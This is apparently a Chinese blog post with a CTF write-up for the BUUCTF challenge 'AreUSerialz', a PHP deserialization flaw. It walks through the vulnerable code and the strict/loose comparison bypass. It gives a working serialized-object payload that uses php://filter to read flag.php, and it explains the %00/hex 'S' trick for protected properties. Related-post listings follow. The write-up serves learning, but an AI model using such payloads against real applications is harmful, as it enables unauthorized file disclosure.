网鼎杯2020php反序列化,[BUUCTF-WEB] [网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2024-03-15 23:57:51 发布
最新推荐文章于 2024-03-15 23:57:51 发布
阅读量200 收藏
点赞数
文章标签: 网鼎杯2020php反序列化

Subject

PHP 代码审计 Deserialize

Mind Palace

74c638b16ca07599a7af92e85f4c4242.png

粗略扫一眼代码,基本确定是反序列化漏洞:

function is_valid($s){

for($i = 0; $i < strlen($s); $i++)

// string: s[i] is between ' ' to '}'

if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))

return false;

return true;

}

if(isset($_GET{'str'})) {

$str = (string)$_GET['str'];

if(is_valid($str)) {

// str is valid ==> deserialize str

// construct class FileHandler's serialization

$obj = unserialize($str);

}

}

复制代码

需要用 GET 的方式传入序列化字符串 str;同时 is_valid 函数规定字符的范围为 [32, 125];然后反序列化这个字符串

function __destruct(){

if($this->op === "2")

$this->op = "1";

$this->content = "";

$this->process();

}

复制代码

观察析构函数:如果 op 的值是 "2" (这里是 === 强类型比较),那么就将 op 的值改为 "1";同时清空 content 的值并执行 process 函数

public function process(){

if($this->op == "1") {

$this->write();

} else if($this->op == "2") {

$res = $this->read();

$this->output($res);

} else {

$this->output("Bad Hacker!");

}

}

复制代码

在 process 函数中如果 op 的值是 "1":执行 write 函数,如果 op 的值是 "2":执行 read 函数并把输出传给 res,否则输出错误 (这里是 == 弱类型比较)

op 为 "1" 的时候,进入 write 函数没有可以利用的点

payload 1

这里利用 === 和 == 的区别:可以利用 $op = 2 ==> 这样可以使得我们在析构函数中的判断 if $this->op === "2" 为假;process 的函数中的判断 else if($this->op == "2") 为真

利用 payload 1 进入 read 函数:

private function read(){

$res = "";

if(isset($this->filename)) {

$res = file_get_contents($this->filename);

}

return $res;

}

private function output($s){

echo "[Result]:
";

echo $s;

}

复制代码

观察到 filename 是可以控制的,接着使用 file_get_contents 函数读取文件,此处借助 php://filter 伪协议读取文件,获取到文件后使用 output 函数输出;

但是,$op, $filename, $content 三个变量权限都是 protected,而 protected 权限的变量在序列化的时会有 %00*%00 字符,%00 字符的ASCII码为 0,就无法通过上面的 is_valid 函数校验

0x01 方法一

php7.1+ 版本对属性类型不敏感,本地序列化的时候将属性改为 public 可进行绕过

2d69ea62073d60dd5e30f908948ccfe4.png

payload 2-1

注意 urlencode

url/index.php?str=%27O:11:"FileHandler":3:{s:5:"*op";i:1;s:11:"*filename";s:52:"php://filter/convert.base64-encode/resource=flag.php";s:10:"*content";N;}%27

复制代码

0x02 方法二

把不可见字符 %00 转为使用 \00 这种十六进制字符串 (并且需要把 s 改为 S)

Look Ahead

PHP 序列化的时候如果变量是 private or protected 将会比 public 的时候变量名前面多增加一串字符 %00*%00 而 %00 是不可见的字符,直接进行复制粘贴的时候容易出现错误;(在本题中,%00 的字符就不能通过 if 的判断)

同时,在平常也容易出现小错误

解决方法是:序列化字符串中可以用大写的 S 替换小写的 s,大写的 S 可以使后面的字符串用16进制表示

s:7:"%00*%00Test" --> S:7:"\00*\00Test"

复制代码

END ヾ(・ε・`*)

weixin_39846289
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反序列化(PHP,python),涉及字符逃逸和phar
2202_75361164的博客
10-22 515
反序列化,涉及php和python,php的字符逃逸和phar
BUUCTF 13
qq_52431855的博客
01-26 140
知识点 publicprivate protected 变量 public 表示全局,类内部外部子类都可以访问; private表示私有的,只有本类内部可以使用; protected表示受保护的,只有本类或子类或父类中可以访问; php Is_Valid函数 语法:IsValid(objectname) 参数:objectname:要检查的对象名。 作用:检查对象变量是否已经实例化,即实例变量的值是否是个有效的对象。 序列化 Private 权限 该权限是私有权限,也就是说只能 ..
BUUCTF闯关日记--[网鼎杯 2020 青龙]AreUSerialz
qq_64201116的博客
05-20 285
总算是自己做出了一题反序化了,大概是明白了一点点反序化的东西了 这里写出我自己的理解 进入页面 做反序化,我们先看关键代码 if(isset($_GET{'str'})) { $str = (string)$_GET['str']; if(is_valid($str)) { $obj = unserialize($str); } } 其他就不做解释了,直接看 if(is_valid($str)) //这个是要分析的代码 这个是is_v
buu ctf总结
Lelouch_E的博客
11-03 743
buuctf总结NiZhuanSiWei NiZhuanSiWei 主页是一段php代码,审计: 有file_get_content(),可以利用伪协议写入‘welcome to the zjctf
php反序列化-BUUCTF刷题记录
cike_y
11-30 847
在前面得知要想获取flag,必须恒等于相对应对象成员的变量,这里也不在解释了。继续分析第二部分,可以看见这部分代码属于传参的判断语句,简单来说,你想要控制第一部分的成员变量的恒等于获得flag,就必须要从最后一个php语句的obj进行接受传参内容,前提是让以上的if条件的判断为真。我们先看第一部分较为关键的代码,可以清楚的看见要想获取flag,就必须要让BUU类对象的成员correct的变量恒等于input成员的变量。序列化payload:O:3:“BUU”:2:{s:7:“correct”;
网鼎杯2022白虎题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎,ctf
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
第38天:WEB漏洞-反序列化PHP&JAVA全解(下)1
08-03
此外,还提到了一个2020网鼎杯竞赛的复现案例,其中涉及到Java Web应用的SQL注入和反序列化漏洞。 首先,我们要理解序列化和反序列化的基本概念。序列化是将对象转换为可存储或传输的格式,而反序列化则是将这些...
64-64.渗透测试-PHP序列化与反序列化.mp4
最新发布
05-10
64-64.渗透测试-PHP序列化与反序列化.mp4
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
CVE-2020-9484的根源在于错误配置和`org.apache.catalina.session.FileStore`件中的本地文件包含(LFI)以及反序列化问题。当Tomcat配置使用`org.apache.catalina.session.PersistentManager`作为会话管理器,并且...
【CTF】buuctf web(三)——PHP序列化与反序列化
m0_52923241的博客
08-04 1763
[极客大挑战 2019]PHP 题目类型:序列化与反序列化 这儿提示备份网站,用dirsearch扫一下后台目录 输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php 找到www.zip,访问一下 跳出弹窗,点击下载 发现有flag.php目录 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 无用信息 查看index.php
BUUCTF-web [极客大挑战 2019]PHP1 之 反序列化漏洞
yu_jing_hong的博客
12-02 2901
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼凑还原数据的过程。 二,PHP中的反序列方法 PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化和反序列化。 序列化:serialize()将一个对象转换成一个字符串。反序列化:un.
CTF-反序列化
qq_61774705的博客
08-15 4351
反序列化
CTF php反序列化总结
m0_53567065的博客
11-17 4440
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
Web方向】 3-1 PHP反序列化buuCTF实例UnserializeOne wp
wanderer的博客
11-16 464
BUUCTF PHP反序列化UnserializeOne wp,过程有点绕脑……
buuctf easy_serialize_php 解析
qq_73722777的博客
03-29 159
因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,于是我们尝试直接给_SESSION[img]赋值。s:59:"a做为user的属性值,读取到a的时候结束,后面的;进行了闭合,相当于吞掉了一个属性和值,接着会继续读取我们构造的img,由于总共三个属性,我在后边加上了一个属性和值,后边的序列化结果直接就被丢弃。将这里的user和function进行修改,然后这里会进行代码一开始的过滤,将变量$img中的php flag php5 php4 fl1g的字符串替换成’'空字符。
buuctf】MRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 995
真的很详细
【网络安全 | CTF】CTF极客大挑战2019PHP解题详析(Dirsearch+php反序列化
等风来
08-24 4692
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
BUUCTF之[网鼎杯 2020 朱雀]phpweb ------- 反序列化
weixin_44632787的博客
06-25 732
BUUCTF之[网鼎杯 2020 朱雀]phpweb ------- 反序列化 题目 Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and
2020 YCBCTF羊城杯官方Writeup:PHPWeb安全解题技巧实录
2020YCBCTF羊城杯官方Writeup是一份详细的竞赛报告,涵盖了该年度网络安全 Capture The Flag (CTF) 比赛中的一系列挑战,主要集中在WebPHP、漏洞利用、密码学、以及逆向工程等不同领域。以下是各个部分的主要知识...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值